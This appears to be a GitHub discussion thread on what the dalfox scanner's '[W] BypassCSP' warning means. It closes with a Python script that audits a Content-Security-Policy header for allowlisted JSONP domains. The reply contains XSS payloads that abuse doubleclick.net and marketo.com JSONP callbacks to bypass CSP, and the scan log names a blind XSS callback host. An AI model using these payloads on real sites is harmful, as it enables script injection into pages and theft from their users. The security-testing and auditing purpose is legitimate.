What is [W]?? #182
Unanswered
SAGEof6iixPATHS
asked this question in
Q&A
Replies: 1 comment
-
Hi @SAGEof6iixPATHS ,
Case of CSP Bypassing patterns:
doubleclick.net
"><script+src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script>
marketo.com
"><script+src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
"><script+src="http://app-e.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
If you have any more questions, please reply! Enjoy the rest of your day!
I am seeing this when I ran on a website:
[*] Target URL: https://www.target.coml/page/anotherpage?overviewPage=FUZZ
[*] Valid target [ code:301 / size:162 ]
[*] Using dictionary mining option [list=GF-Patterns] 📚⛏
[*] Using DOM mining option 📦⛏
[*] Start BAV(Basic Another Vulnerability) analysis / [sqli, ssti, OpenRedirect] 🔍
[*] Start static analysis.. 🔍
[*] Start parameter analysis.. 🔍
[I] Found 1 testing point in DOM Mining
[*] Static analysis done ✓
[*] Parameter analysis done ✓
[*] BAV analysis done ✓
[I] X-Frame-Options is SAMEORIGIN
[I] Strict-Transport-Security is max-age=31536000 ; includeSubDomains
[I] Content-Type is text/html
[I] Content-Security-Policy is report-uri /cspreport; frame-src https://acestream.me https://*.bazaarvoice.com https://*.bbvms.com https://*.bookingbug.com https://*.bruynzeelhomeproducts.nl https://*.configuratoren.nl https://*.ctfassets.net https://*.doubleclick.net https://*.expivi.dev https://*.expivi.net https://*.facebook.com https://*.facebook.net https://*.target.com https://*.target.com https://targetservice.com https://*.targetservice.com https://*.h-ip.nl https://h-ip.nl https://*.hetmooistegordijn.nl https://*.hotjar.com https://*.iesnare.com https://inboxstorage.eu https://*.inboxstorage.eu https://*.juicebv.nl https://*.karwei.nl https://*.karweimontageservices.nl https://karweimontageservices.nl https://*.kastendesigner.nl https://*.leadfamly.com https://*.lundia.nl https://*.marketo.com https://*.mopinion.com https://*.optimizely.com https://*.picarioserver.com https://*.sentimo.nl https://*.svtrd.com https://*.telemos.nl https://*.trendiy.com https://*.wepublish.com https://*.xidoor.com https://*.youtube.be https://*.youtube.com https://*.zoofy.nl; frame-ancestors 'self' folder.target.com
[W] BypassCSP: *.doubleclick.net *.marketo.com
Needs manual testing. please refer to it. https://t.co/lElLxtainw?amp=1
[*] Generate XSS payload and optimization.Optimization.. 🛠
[*] Added your blind XSS (payload.xss.ht)
[*] Start XSS Scanning.. with 37 queries 🗡
[*] Finish :D
Is that because of the status code (301)? But there are some 200s too... Let me know
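To show what the [W] BypassCSP line above is keyed on, here is an added audit script (not part of dalfox or of this thread) that parses a CSP header and reports every allowlisted source whose host falls under a known JSONP-hosting domain; the host list is an assumption built from the two domains named in the reply, and the sample header is constructed from the one in the scan output. It also reports the directive each match lives in and whether the policy has any script-src/default-src at all, since a JSONP host allowlisted only under frame-src, as in this output, does not change what scripts the page may run, and a policy with no script-src or default-src does not restrict scripts in the first place.

```python
import re

# Domains that the tool's warning keys on, taken from the reply above.
# Assumed stand-in for the tool's full pattern list.
KNOWN_JSONP_HOSTS = ["doubleclick.net", "marketo.com"]

# Directives whose sources govern which scripts the page may execute.
SCRIPT_DIRECTIVES = {"script-src", "script-src-elem", "default-src"}

# Constructed sample, shortened from the header in the scan output.
SAMPLE_CSP = ("report-uri /cspreport; frame-src https://acestream.me "
              "https://*.doubleclick.net https://*.marketo.com; "
              "frame-ancestors 'self' folder.target.com")


def parse_csp(header):
    """Split a CSP header into {directive: [source, ...]}."""
    policy = {}
    for part in header.split(";"):
        tokens = part.strip().split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def source_host(source):
    """Host part of a CSP source expression; None for 'self'-style keywords."""
    if source.startswith("'"):
        return None
    host = re.sub(r"^[a-z][a-z0-9+.-]*://", "", source, flags=re.I)
    return host.split("/")[0].split(":")[0].lower()   # drop path and port


def host_matches(host, pattern):
    """True if host (possibly '*.example.com') is pattern or a subdomain of it."""
    bare = host[2:] if host.startswith("*.") else host
    return bare == pattern or bare.endswith("." + pattern)


def audit_csp(header):
    """Return (findings, scripts_unrestricted): findings is a list of
    (directive, source) pairs whose host is a known JSONP domain;
    scripts_unrestricted is True when no directive limits scripts at all."""
    policy = parse_csp(header)
    findings = []
    for directive, sources in policy.items():
        for src in sources:
            host = source_host(src)
            if host and any(host_matches(host, p) for p in KNOWN_JSONP_HOSTS):
                findings.append((directive, src))
    return findings, not (SCRIPT_DIRECTIVES & policy.keys())


def script_capable(findings):
    """Only the matches that sit in a directive controlling script loading."""
    return [f for f in findings if f[0] in SCRIPT_DIRECTIVES]
```

Run `audit_csp(SAMPLE_CSP)` to see the two frame-src matches from the scan, and `script_capable(...)` to see that none of them widens script execution.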